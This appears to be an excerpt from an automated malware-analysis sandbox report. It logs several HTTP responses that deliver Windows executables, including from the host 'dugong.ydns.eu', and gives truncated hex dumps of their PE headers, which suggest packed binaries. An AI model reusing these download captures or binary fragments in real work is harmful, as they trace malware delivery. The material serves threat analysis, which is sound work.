00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:25:53 GMTETag: "1d4c00-62fa693f1c20c"Accept-Ranges: bytesContent-Length: 1920000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 40 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 43 13 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 24 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 24 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 62 73 68 69 71 78 70 00 40 1a 00 00 f0 31 00 00 38 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6a 64 73 6d 6d 7a 78 00 10 00 00 00 30 4c 00 00 04 00 00 00 26 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4c 00 00 22 00 00 00 2a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:16:57 GMTETag: "3c2e00-62fa673fa87d8"Accept-Ranges: bytesContent-Length: 3943936Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 70 4d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 0e 25 00 00 6a 29 00 00 00 00 00 00 e0 a0 00 00 10 00 00 00 50 48 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 10 a1 00 00 04 00 00 45 3c 3c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 90 53 00 68 00 00 00 00 80 52 00 bc 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 53 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 52 00 00 10 00 00 00 ea 1f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 bc 0a 01 00 00 80 52 00 00 0c 01 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 53 00 00 02 00 00 00 06 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 32 00 00 a0 53 00 00 02 00 00 00 08 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6f 75 6f 75 62 74 66 00 00 1b 00 00 d0 85 00 00 fc 1a 00 00 0a 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 74 61 78 6e 73 6e 6e 00 10 00 00 00 d0 a0 00 00 06 00 00 00 06 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 a0 00 00 22 00 00 00 0c 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:25:53 GMTETag: "1d4c00-62fa693f1c20c"Accept-Ranges: bytesContent-Length: 1920000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 40 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 43 13 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 24 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 24 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 62 73 68 69 71 78 70 00 40 1a 00 00 f0 31 00 00 38 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6a 64 73 6d 6d 7a 78 00 10 00 00 00 30 4c 00 00 04 00 00 00 26 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4c 00 00 22 00 00 00 2a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:10:51 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:45 GMTETag: "a7550-6288a270bb76e"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:53 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:25:53 GMTETag: "1d4c00-62fa693f1c20c"Accept-Ranges: bytesContent-Length: 1920000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 40 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 43 13 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 24 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 24 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 62 73 68 69 71 78 70 00 40 1a 00 00 f0 31 00 00 38 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6a 64 73 6d 6d 7a 78 00 10 00 00 00 30 4c 00 00 04 00 00 00 26 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4c 00 00 22 00 00 00 2a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:10:53 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:46 GMTETag: "94750-6288a270e7691"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 02 Mar 2025 15:16:11 GMTETag: "6f600-62f5d850dc4c0"Accept-Ranges: bytesContent-Length: 456192Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 35 dd 0f b0 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 46 01 00 00 08 00 00 00 00 00 00 8e 65 01 00 00 20 00 00 00 80 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 07 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 65 01 00 4b 00 00 00 00 80 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 0c 00 00 00 f8 64 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 45 01 00 00 20 00 00 00 46 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 80 01 00 00 06 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 43 53 53 00 00 00 00 00 a4 05 00 00 c0 01 00 00 a4 05 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
